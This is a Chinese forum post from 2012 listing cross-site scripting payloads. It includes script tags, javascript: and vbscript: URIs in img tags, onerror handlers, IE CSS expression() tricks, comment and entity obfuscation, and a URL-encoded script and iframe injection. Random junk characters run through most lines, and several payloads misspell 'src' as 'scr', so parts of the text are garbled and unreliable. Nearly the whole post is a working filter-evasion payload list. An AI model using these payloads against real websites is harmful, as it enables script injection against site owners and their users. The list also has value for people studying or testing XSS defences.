<script>alert("跨站")</script> (最常用)
9 S/ j- P& N2 h5 z, K0 V3 M<img scr=javascript:alert("跨站")></img>
5 ]" ]7 V, \0 H* O- |<img scr="javascript: alert(/跨站/)></img>
$ O! `' A/ p# T$ d. l* d' K. r! [<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)3 |3 _; _, l4 } u3 z' B
<img scr="#" onerror=alert(/跨站/)></img>' f0 a! L! A! n; A. Z) U$ q
<img scr="#" style="xss:expression(alert(/xss/));"></img> ?% n& E+ V0 K/ {9 k- B, t) n. S
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)8 v _& p( j8 t' U9 P
<img src=vbscript:msgbox ("xss")></img>8 r; x* ~" q# a, \
<style> input {left:expression (alert('xss'))}</style>
. `) u) i I2 E+ y: s<div style={left:expression (alert('xss'))}></div>
9 z8 _4 H& x: w. }<div style={left:exp/* */ression (alert('xss'))}></div>
( ~, Z9 i: k S. C0 U<div style={left:\0065\0078ression (alert('xss'))}></div>
. D! }7 B* \' b/ ehtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
( l0 J' Q, s/ O( g8 R9 K1 q5 xunicode <div style="{left:expRessioN (alert('xss'))}">, m4 M. E. b4 t! Q7 u
5 c6 e1 e5 {- w8 h$ y" m. S% l" A
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["4 M8 j$ [2 f7 K$ } t% }& Y
|
发表于 2012-9-15 14:09:13
收藏
支持
反对